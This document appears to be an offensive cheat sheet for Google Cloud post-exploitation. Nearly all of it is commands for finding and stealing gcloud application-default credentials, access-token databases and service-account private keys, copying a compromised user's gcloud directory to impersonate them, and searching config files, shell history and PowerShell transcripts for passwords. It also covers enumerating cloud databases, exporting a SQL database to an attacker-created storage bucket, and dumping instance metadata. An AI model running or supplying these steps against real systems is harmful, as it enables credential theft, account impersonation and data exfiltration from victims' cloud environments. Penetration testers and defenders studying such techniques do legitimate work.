External application (default credential)
Stored in $HOME/.config/gcloud/application_default_credentials.json or %APPDATA%\gcloud\application_default_credentials.json
Or $env:GOOGLE_APPLICATION_CREDENTIALS= variable
Get-ChildItem -Path C:\users\* -Include *application_default_credentials.json* -Recurse -Force -ErrorAction silentlycontinue
find /home/ -iname application_default_credentials.json 2>/dev/null
env | grep GOOGLE
Saved in $HOME/.config/gcloud/ or %APPDATA%\gcloud\
Value stored in sqllite database. access_tokens.db, table access_tokens.db.
Get-ChildItem C:\Users\* -Name gcloud -Directory -Recurse -Force -ErrorAction silentlycontinue
find /home/ -iname gcloud 2>/dev/null
Copy gcloud dir to your own home directory to auth as the compromised user
sudo cp -r /home/< USER> /.config/gcloud ~ /.config
sudo chown -R < USER> :< USER> ~ /.config/gcloud
gcloud auth list
Find json key files for service accounts. Doesn't have a default name. But layout is:
{
"type": "service_account",
"project_id": "<PROJECT ID>",
"private_key_id": "<ID>",
"private_key": "<KEY>",
"client_email": "<SERVICE ACCOUNT EMAIL>",
"client_id": "<ID>",
"auth_uri": "https://accounts.google.com/o/oauth2/auth",
"token_uri": "https://oauth2.googleapis.com/token",
"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/svc-acc%40alert-nimbus-335411.iam.gserviceaccount.com"
}
grep -ir --include=\*.json 'private_key_id' / 2>/dev/null
Get-ChildItem C:\ -Recurse -Force -Include *.json -Erroraction silentlycontinue | Select-String "private_key_id"
Authenticate with key file gcloud auth activate-service-account --key-file key.json
Web config and App config files
Web.config and app.config files might contain creds or access tokens.Look for management cert and extract to .pfx like publishsettings files
sudo find / -name web.config 2>/dev/null
Get-ChildItem -Path C:\ -Filter app.config -Recurse -ErrorAction SilentlyContinue -Force
Find internal repos (scan for port 80, 443 or Query AD and look for subdomains or hostnames as git, code, repo, gitlab, bitbucket etc)
Tools for finding secrets
Look through command history
~/.bash_history or %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
sudo find / -name .bash_history 2>/dev/null
Get-ChildItem -Path C:\ -Filter *ConsoleHost_history.txt* -Recurse -ErrorAction SilentlyContinue -Force
cat <FILE> | select-string password
cat <FILE> | select-string secure
Get-Childitem -Path C:\* -Force -Include *transcript* -Recurse -ErrorAction SilentlyContinue
type C:\Transcripts\20210422\PowerShell_transcript.DESKTOP-M7C1AFM.6sZJrDuN.20210422230739.txt
gcloud sql instances list
gcloud sql databases list --instance <instance name>
gcloud spanner instances list
gcloud spanner databases list --instance <instance name>
gcloud bigtable instances list
Create new storage bucket, change perms, export SQL DB gsutil mb gs://<googlestoragename>
gsutil acl ch -u <service account> gs://<googlestoragename>
gcloud sql export sql <sql instance name>
gs://<googlestoragename>/sqldump.gz --database=<database name>
gsutil cp gs://bucket-name/folder/
curl " http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" " Metadata-Flavor: Google"